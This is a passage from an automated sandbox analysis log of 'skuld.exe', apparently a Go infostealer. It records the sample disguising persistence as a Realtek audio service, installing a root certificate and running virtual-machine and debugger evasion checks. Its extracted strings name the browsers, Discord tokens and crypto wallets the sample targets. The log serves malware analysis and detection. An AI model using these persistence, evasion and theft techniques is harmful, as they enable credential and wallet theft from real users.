                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
                        Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
                        Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
                        Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: skuld.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                        Source: skuld.exe Static file information: File size 10810368 > 1048576
                        Source: skuld.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4f5400
                        Source: skuld.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x49f400
                        Source: skuld.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: \de.pdb- source: powershell.exe, 0000000D.00000002.1750605132.000001CAF7485000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.pdb source: powershell.exe, 0000000D.00000002.1594297796.000001CAE07C4000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.pdbhPtC source: powershell.exe, 0000000D.00000002.1594297796.000001CAE07C4000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline"
                        Source: skuld.exe Static PE information: section name: .xdata
                        Source: skuld.exe Static PE information: section name: .symtab
                        Source: SecurityHealthSystray.exe.0.dr Static PE information: section name: .xdata
                        Source: SecurityHealthSystray.exe.0.dr Static PE information: section name: .symtab

                        Persistence and Installation Behavior

                        Source: C:\Users\user\Desktop\skuld.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                        Source: C:\Users\user\Desktop\skuld.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                        Source: C:\Users\user\Desktop\skuld.exe Process created: attrib.exe
                        Source: C:\Users\user\Desktop\skuld.exe Process created: attrib.exe
                        Source: C:\Users\user\Desktop\skuld.exe Process created: attrib.exe
                        Source: C:\Users\user\Desktop\skuld.exe Process created: attrib.exe
                        Source: C:\Users\user\Desktop\skuld.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.dll
                        Source: C:\Users\user\Desktop\skuld.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\partmgr
                        Source: C:\Users\user\Desktop\skuld.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service
                        Source: C:\Users\user\Desktop\skuld.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\skuld.exe    Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                        Source: C:\Users\user\Desktop\skuld.exe    Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exe    Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exe    Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\netsh.exe    Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                        Source: C:\Users\user\Desktop\skuld.exeSection loaded: OutputDebugStringW count: 1944
                        Source: C:\Users\user\Desktop\skuld.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3745
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6081
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4638
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4224
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5952
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3484
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172Thread sleep count: 3745 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4656Thread sleep count: 6081 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4760Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1612Thread sleep count: 5952 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6588Thread sleep count: 3484 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4632Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\skuld.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                        Source: C:\Users\user\Desktop\skuld.exeFile Volume queried: \Device\CdRom0\ FullSizeInformation
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: OpenEventAUnlockFileunrechableno consoleenter-fastCounterKDFRIPEMD-160impossible[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]rune <nil>image: NewBM????res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugrsa1024mincrypto/rsacrypto/tlsx509rsacrtParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_nonceML-KEM-768ML-KEM PCTPOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: Handshakemath/randClassINETAuthorityquestionscSHAKE128info_hashuser32.dllvmwaretrayxenservicevmwareusermegadumperscyllahidevirtualboxPxmdUOpVyxQ9IATRKPRHPaul Jonesd1bnJkfVlHQarZhrdBpjPC-DANIELEqarzhrdbpjq9iatrkprhd1bnjkfvlhJUDES-DOJOGJAm1NxXVmdOuyo8RV7105KvAUQKPQOf20XqH4VLpxmduopvyxJcOtj17dZxcM0uEGN4do64F2tKIqO5GexwjQdjXGfNBDSlDTXYmcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootlogins.txtLogin DataChrome SxS360BrowserUR BrowserdiscordptbinitiationByHackirbysecure.datauto_startsteam-tempEpic Games.minecraftRiot GamesShowWindow-NoProfileExtensionsExodusWeb3PaliWalletwinsymlink/dev/stdinCreateFileterminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dllexecerrdotSYSTEMROOTavatar_url
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugrsa1024mincrypto/rsacrypto/tlsx509rsacrtParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_nonceML-KEM-768ML-KEM PCTPOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilcpu%dfilesimap2imap3imapspop3shostsrouteparseSHA-1sse41sse42ssse3matchrune NRGBAtls: Earlyutf-8%s*%dtext/bad n (at ClassP-224P-256P-384P-521ECDSAx32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidraVMwarevmwarexc64zb8VizSM373836ALIONETVM-PCgeorgeGRAFPCT00917test42XC64ZB5Y3y73serverh86LHDDdQrgcQfofoGlK3zMRPgfV1XIZZuXj8vizsmASPNETS7WjufUser01tHiF2TGjBsjbLouiseGGw8NR3W1GJT-ForceattribNumberembedssqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsecretpaypalbanquewalletcryptoexodusatomiccomptecreditpermisnumberbackupconfigVideosinlinefieldsConfigIntentMeteorImpactPolyMCBypassSystem
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: tznameAES-NIrdtscppopcntsha256SHA-NIempty rune1 RGBA64Gray16X25519%w%.0wAcceptServercmd/goheaderAnswerLengthsha512%s: %sSTREETavx512rdrandrdseedwebhookcryptosregeditollydbgdf5servvmusrvctaskmgrqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe pro3u2v9m8SERVER1MIKE-PCNETTYPClisa-pcHEUeRzljohn-pcZELJAVALISA-PCWILEYPCJOHN-PCserver1wileypcAIDANPC7DBgdxuJAW4Dz0cMkNdS6Mr.Nonej7pNjWMequZE3Jo6jdigqKUv3bT4ymONofgheuerzlIVwoKUFavg.comDefaultFirefoxMercuryAddressNetworkCookiesHistorykey4.dbThoriumIridiumVivaldiOrbitumMaxthonK-MelonSputnikSlimjetOperaGXaccountaddressDesktopcontentAppDatadiscordmodulesRoamingversionWindowsFeatherBadlionleveldbAPPDATACaption%.2f GBprofileDiscord`Nitro`.sqlitecmd.exeWallets\ArmoryCoinomiBinanceMartianPhantomSafepalSolfareiWalletLICENSEProtectfloat32float64readdirconsoleabortedCopySidWSARecvWSASendconnectsignal runningPATHEXT_pragmapragma _txlocknumber nil keyUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT19531259765625FreeSidSleepExinvaliduintptrSwapperChanDir Value>Convert\\.\UNCforcegcallocmWcpuprofallocmRunknowngctraceIO waitsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
